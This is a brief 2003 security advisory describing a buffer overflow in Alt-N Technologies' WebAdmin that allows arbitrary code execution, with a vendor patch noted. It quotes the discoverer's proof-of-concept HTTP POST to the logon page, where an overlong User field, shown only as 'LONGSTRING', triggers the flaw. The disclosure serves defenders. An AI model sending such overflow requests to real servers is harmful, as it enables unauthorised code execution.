Buffer Overflow Vulnerability in Alt-N Technologies WebAdmin.exe

Reported June 24, 2003, by Mark Litchfield.

VERSIONS AFFECTED

DESCRIPTION

·         A buffer overflow vulnerability in Alt-N Technologies WebAdmin can result in the execution of arbitrary code on the vulnerable computer. 

DEMONSTRATION

The discoverer posted the following scenario as proof of concept.

POST /WebAdmin.dll?View=Logon HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/x-shockwave-flash, */*

Referer: http://ngssoftware.com:1000/

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: MyUser Agent

Host: NGSSoftware.com

Content-Length: 74

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: User=NGSSOFTWARE; Lang=en; Theme=Standard

User=LONGSTRING&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In

VENDOR RESPONSE

Alt-N Technologies has released a patch to fix this vulnerability.

CREDIT

Discovered byMark Litchfield ofNGSSoftware.